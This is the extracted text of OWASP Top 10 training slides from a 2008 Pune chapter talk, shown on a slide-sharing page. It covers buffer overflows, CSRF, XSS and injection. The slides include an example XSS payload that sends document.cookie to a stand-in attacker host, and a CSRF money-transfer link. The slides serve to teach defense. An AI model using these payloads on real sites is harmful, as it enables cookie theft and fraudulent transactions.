Recomendados
Más contenido relacionado
La actualidad más candente
La actualidad más candente (20)
Destacado
Destacado (20)
Similar a Owasp Top 10 - Owasp Pune Chapter - January 2008
Similar a Owasp Top 10 - Owasp Pune Chapter - January 2008 (20)
Último
Último (20)
Owasp Top 10 - Owasp Pune Chapter - January 2008
- 1. Pune, India January 2008
- 2. SANS @RISK December 2007 3 Dec 10 Dec 17 Dec 24 Dec 31 Dec Total Microsoft Products 2 3 12 0 2 19 Mac 2 2 2 4 0 10 Linux 10 5 8 11 0 34 Unix, Solaris, etc 5 3 3 4 1 16 Network Device 1 3 1 1 1 7 Others ( various ) 31 33 30 37 16 147 Web Applications 70 34 52 35 52 243
- 8. OWASP Top 10 2004
- 12. Buffer 1 Return address Other data -------------- --------------
- 13. -------------- -------------- 90909090 90909090 90909090 90909090 90909090 Return Address Filled Buffer with NOP’s and Shellcode Shellcode
- 25. www.bank.com Victim Attacker Logging Request Auth Cookies Legitimate Requests Sends an email containing malicious href tag. Click Here Transfer Money <a href= http://www.bank.com/transfer.php?acc=attacker&amount=$10000 > 1 2 3 4 5 6 7
- 37. Reflected XSS BID - 21534
- 41. www.bank.com Victim Attacker Logging Request Auth Cookies Legitimate Requests Click Here Stolen Cookies 1 2 3 4 5 6 7 Sends malicious request <script>document. location=“http://attacker/steal_cookies.php?cookies=“+document. cookie</script>
- 46. Injection Flaws
- 63. Insecure Direct Object Reference
- 80. login.asp homepage.asp login.asp homepage.asp logoff Client Server GET www.abc.com www.abc.com/login.asp POST username + password www.abc.com/homepage.asp
- 81. login.asp authenticate.asp login.asp Redirect request logoff homepage.asp homepage.asp Client Server GET www.abc.com www.abc.com/login.asp POST username + password Redirect : www.abc.com/homepage.asp GET www.abc.com/homepage.asp www.abc.com/homepage.asp